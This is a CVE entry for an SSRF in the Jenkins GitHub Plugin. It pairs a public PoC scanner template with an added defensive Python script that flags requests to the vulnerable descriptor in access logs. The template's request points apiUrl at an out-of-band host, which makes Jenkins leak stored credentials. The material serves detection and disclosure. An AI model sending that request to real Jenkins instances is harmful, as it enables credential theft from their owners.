An exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
PoC code [public]
id: CVE-2018-1000600

info:
  name: Pre-auth Fully-responded SSRF
  author: geeknik
  severity: high
  verified: false
  description: An exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
  reference:
    - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915
    - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
  tags: cve,cve2018,ssrf
  created: 2024/02/25

set:
  oob: oob()
  oobHTTP: oob.HTTP

rules:
  r0:
    request:
      method: GET
      path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl={{oobHTTP}}
    expression: oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()
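
A defensive complement to the template above, added here as an example (it is not part of the original PoC or of the Jenkins project): a scan of web access logs for requests to the GitHubTokenCredentialsCreator descriptor, raising an alert when apiUrl points outside an allow list. The combined log format, the EXPECTED_API_HOSTS allow list and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Descriptor segment taken from the request path in the template above.
DESCRIPTOR = ("/descriptorbyname/org.jenkinsci.plugins.github.config."
              "githubtokencredentialscreator/")
# Assumption: the only GitHub API host this Jenkins should ever be pointed at.
EXPECTED_API_HOSTS = {"api.github.com"}
# Request part of a combined-format access log line.
LOG_RE = re.compile(
    r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def inspect_line(line):
    """Return a finding for a request to the descriptor, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    # Decode the path so percent-encoded variants still match.
    if DESCRIPTOR not in unquote(target.path).lower():
        return None
    # parse_qs percent-decodes the values; a missing host becomes "".
    hosts = [urlsplit(u).hostname or ""
             for u in parse_qs(target.query).get("apiUrl", [])]
    unexpected = [h for h in hosts if h not in EXPECTED_API_HOSTS]
    return {"src": m.group("src"), "method": m.group("method"),
            "status": int(m.group("status")), "api_hosts": hosts,
            "verdict": "alert" if unexpected else "review"}

def scan(lines):
    """Inspect every line and keep only the findings."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (documentation addresses and hostnames).
P = ("/descriptorByName/org.jenkinsci.plugins.github.config."
     "GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=")
SAMPLE = [
    '192.0.2.10 - - [25/Feb/2024:10:00:00 +0000] "GET /securityRealm/user/admin' + P
    + 'http%3A%2F%2Fcollector.example.test%2Fx HTTP/1.1" 200 12',
    '192.0.2.11 - - [25/Feb/2024:10:00:05 +0000] "GET /job/build/api/json HTTP/1.1" 200 512',
    '198.51.100.7 - alice [25/Feb/2024:10:01:00 +0000] "POST ' + P
    + 'https%3A%2F%2Fapi.github.com HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Any hit on this descriptor is worth a look on an unpatched instance; the "review" verdict only means the apiUrl host was on the allow list.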